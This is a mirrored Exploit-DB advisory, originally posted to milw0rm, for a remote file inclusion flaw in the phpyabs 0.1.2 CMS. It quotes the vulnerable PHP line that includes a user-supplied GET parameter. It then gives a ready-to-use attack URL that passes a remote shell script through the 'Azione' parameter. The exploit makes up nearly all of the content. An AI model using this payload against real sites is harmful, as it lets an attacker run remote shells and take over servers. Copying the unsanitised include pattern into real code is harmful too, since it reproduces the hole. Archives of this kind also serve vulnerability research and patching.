exploit-db-mirror/exploits/php/webapps/8005.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
691 B
Text

********************************************************************************
phpyabs 0.1.2 RFI Vulnerability
********************************************************************************
FOUND BY: Arka69
BUG: Remote File Include (RFI)
CMS: phpyabs 0.1.2
SITE: http://exploita.altervista.org
********************************************************************************
VULNERABLE CODE: (phpyabs/moduli/libri/index.php)
include($_GET['Azione'].".php");
********************************************************************************
RFI:
http://victim.com/phpyabs/moduli/libri/index.php?Azione=[SHELL]
# milw0rm.com [2009-02-06]